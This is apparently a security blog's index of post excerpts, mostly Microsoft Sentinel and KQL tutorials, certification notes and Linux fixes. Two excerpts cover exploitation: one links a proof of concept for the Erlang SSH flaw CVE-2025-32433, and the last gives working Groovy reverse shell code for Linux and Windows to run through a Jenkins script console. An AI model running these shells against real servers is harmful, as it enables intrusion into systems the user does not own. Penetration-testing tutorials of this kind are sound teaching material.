
Posts

Microsoft Sentinel : KQL extend operator

The extend operator is used to extend the current dataset with additional columns as per the requirement. In this example, a new column named BootSince_newColumn is added to the output using the extend operator. This new column holds the time difference between the boot time and now. The output shows the newly added column BootSince_newColumn with the value 2342, which is the number of hours since the boot time. For a more commonly applicable real-world example, the extend operator can be used to calculate the number of days since the last login date.
Recent posts

Microsoft Sentinel : KQL project operator

The project operator is used to customize the query result output as per your needs. This doesn't remove or modify any logs; it only affects how they are presented for that particular query, for that particular run. Use project to keep only particular columns instead of all available columns. If you wish to remove only a column and keep all other available columns, then use project-away. The project-rename option can be used to rename a column; in this example, the column named "Computer" is renamed to "device". To reorder the columns, use project-reorder. To summarize:
project: Determines the columns to include, rename, or drop, and inserts new computed columns.
project-away: Determines which columns from the input should be excluded from the output.
project-keep: Determines which columns from the input to keep in the output using a column name pattern match.
project-rename: Renames columns in the output.
project-reorder: Reorders columns in the ...

Microsoft Sentinel : KQL search query with examples

Search operator
To search for all logs that contain a particular keyword. This is useful when you are unsure about the table.
search "keyword"
Combining and / or with the search operator:
search "admin" and "login"
search "admin" and ("login" or "logout")
To search only in particular tables:
search in (SigninLogs, SecurityEvent) "failed"
Typically the search is case insensitive. To search case sensitively, use:
search kind=case_sensitive "admin"
Let's try another case-sensitive search. It returns no result, as intended. We can also use wildcards (*) if we are unsure about the exact table name.
Performing a more granular search: look for particular keywords in specific columns of a table.
search UserName contains "admin" or UserName contains "admin"

Free resources to learn Kusto Query Language (KQL) for Microsoft Sentinel

1) Must Learn KQL: This repository from Rod Trent contains the code, queries, and a free eBook included as part of the Must Learn KQL series. There is also a YouTube playlist related to this. https://github.com/rod-trent/MustLearnKQL
2) Udemy: Learn KQL for Microsoft Sentinel: A free Udemy course created by Samik Roy, designed to refresh your KQL learning and help you boost your application of it for Sentinel. https://www.udemy.com/course/learn-kql-for-microsoft-sentinel/
3) SC-200: Create queries for Microsoft Sentinel using Kusto Query Language (KQL): A Microsoft Learn path. Write Kusto Query Language (KQL) statements to query log data to perform detections, analysis, and reporting in Microsoft Sentinel. This learning path focuses on the most used operators. The example KQL statements showcase security-related table queries. https://learn.microsoft.com/en-us/training/paths/sc-200-u...

Unauthenticated Remote Code Execution in Erlang/OTP SSH (CVE-2025-32433)

Erlang, a programming language for building scalable real-time systems with high availability, forms a powerful ecosystem with the Open Telecom Platform (OTP) framework. Erlang/OTP SSH, an implementation of the SSH protocol, enables secure shell access and file transfers within Erlang-based systems. On April 16, 2025, a critical vulnerability in the Erlang/OTP SSH server was disclosed. This vulnerability could allow an unauthenticated, remote attacker to perform remote code execution (RCE) on an affected device. CVE-2025-32433 is rated with a severity level of 10/10. If upgrading is not possible, then disable SSH as a temporary workaround. PoC Exploit URL: https://github.com/ProDefense/CVE-2025-32433 In this PoC, the payload is harmless: it creates the file lab.txt with the contents "pwned". If a more serious payload or RCE is needed, it must be written in the Erlang language. For example, for a netcat reverse shell payload, use the following command (by editing the PoC...

Ingest Data in Microsoft Sentinel

After deploying Sentinel by creating/assigning a Log Analytics Workspace, the next phase is to ingest logs into the Log Analytics Workspace using data connectors. Data connectors are used to get logs from various sources, including cloud-native sources as well as third-party sources. The Microsoft Sentinel Content hub enables you to discover and install out-of-the-box solutions for Sentinel. A solution is a package that includes analytics rules, data connectors, playbooks, etc. pertaining to that particular product or solution. So, when a solution is deployed from the Content hub, these associated components also get installed. If the entire contents are not required, then we can opt for a stand-alone content source. Let's install the Microsoft Entra ID solution from the Content hub. Click on Install. We can see there are 64 analytics rules, 1 data connector, 11 playbooks and 2 workbooks in this solution. Click on Manage to configure. We can click on each content item and configure it separate...

Log Analytics Workspace and Microsoft Sentinel

A Log Analytics workspace is a type of Azure service where logs can be collected and stored for analysis and retention. Logs from various sources can be piped to the Log Analytics Workspace, and it is one of the crucial components of Microsoft Sentinel. The Log Analytics Workspace serves as the centralised repository for the logs, which are piped in using connectors and agents. A retention policy can be set on the Log Analytics workspace for compliance requirements. The logs are then analysed using Kusto Query Language (KQL). KQL helps to query and filter data to identify patterns, anomalies and potential threats in the environment. In addition to log storage, Log Analytics workspaces offer dashboards and data visualisation options using queries and metrics. Log Analytics can be integrated with Microsoft Sentinel and with Microsoft Defender for Cloud. Sentinel utilises the data stored in Log Analytics workspaces to perform analysis, threat detection, threat hunting and incident i...

About Microsoft Sentinel

A Security Operations Centre (SOC) is a centralised unit that monitors traffic, triages alerts, participates in incident response, performs threat hunting and often performs vulnerability assessments. The individuals who work in a SOC are often referred to as SOC analysts. When it comes to a Microsoft Azure SOC, the analysts work predominantly on Microsoft security, compliance and identity products and solutions such as Microsoft 365, Defender for Cloud, Microsoft 365 Defender, Sentinel, etc. Let's go through the top two products that are critical for a SOC: SIEM and SOAR. A SIEM, or Security Information and Event Management, provides centralised management and a holistic view of all events happening in the organisation by collecting and analysing logs from different sources. A SIEM uses correlation to detect anomalies and create alerts based on defined conditions, whereas a SOAR, or Security Orchestration, Automation and Response, helps to handle incidents efficiently and automatically by inte...

CREST CPSA Exam resources

CREST Practitioner Security Analyst (CPSA). As exam candidates, it might be quite difficult to prepare for the CREST CPSA certification exam as there is no official courseware from CREST. Though there are recommendations from CREST, it is cumbersome to go through each one for the preparation. Therefore, I have written a book on CREST CPSA, aligned with the exam syllabus, covering all knowledge groups. The book is available from Amazon in both paperback and eBook format. Amazon link: https://www.amazon.com/CREST-Practitioner-Security-Analyst-CPSA-ebook/dp/B0F2YGQJQB/ Feel free to check the showcase page cpsaexam.com. I am also working on a practice test based on the exam syllabus and the exam study guide. This is scheduled to be released in April 2025.

Passed the CompTIA CloudNetX Certification

Last July 2024, I participated in the CompTIA CloudNetX Certification Beta Exam (CNX-001) and today I received my results and I passed! As of Feb 2025, the exam is not yet available for purchase and is expected to be open by next month (Q1 2025). CompTIA recommends a minimum of ten years of experience in the IT field and five years of experience in a network architect role, with experience in the hybrid cloud environment, plus Network+, Security+, and Cloud+ or equivalent experience. As per the exam description, the CompTIA CloudNetX certification exam will certify that the successful candidate has the knowledge and skills required to: Analyze business requirements to design and configure secure network architecture for on-premises and cloud environments. Analyze requirements to design for network security, availability, Zero Trust, and identity and access management technologies. Apply and configure concepts and tools related to network monitoring and performance, automation, and scripting. Tro...

HP printer driver issue in Linux [FIX]

My HP printer was automatically detected by Ubuntu but was unable to print anything. You might also encounter issues with your HP printer connecting with a Linux machine. The following solution may fix this issue. Try the command hp-setup -i. This HP Linux Imaging and Printing System utility will download the required drivers and install the printer successfully.

docker-compose: command not found | Kali Linux [FIX]

You might be facing issues installing Docker Compose in Kali Linux. In the latest Kali Linux versions, docker-compose cannot be installed in the traditional way. However, the standalone version can be installed, as mentioned in the installation guide. To download and install the Docker Compose standalone, run:
sudo curl -SL https://github.com/docker/compose/releases/download/v2.32.3/docker-compose-linux-x86_64 -o /usr/local/bin/docker-compose
Apply executable permissions to the standalone binary in the target path for the installation:
sudo chmod +x /usr/local/bin/docker-compose
Test and execute Docker Compose commands using docker-compose.

error: externally-managed-environment | pip3 install Error [FIX]

When a package manager is managing a Python environment, it prevents pip from performing system-wide installation. You can use --break-system-packages to bypass this protection. Add --break-system-packages at the end of the pip command. E.g.: pip install xyz --break-system-packages

Exploiting Jenkins + CVE-2024-23897

Exploiting Jenkins / CVE-2024-23897
Often the script console is accessible without authentication due to misconfiguration, at http://JENKINS_IP/script. If you don't have access to the script console and the version is vulnerable to CVE-2024-23897, then exploit it to read files and get authentication credentials for Jenkins (explained below). Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.
For Linux:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
For Windows:
String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...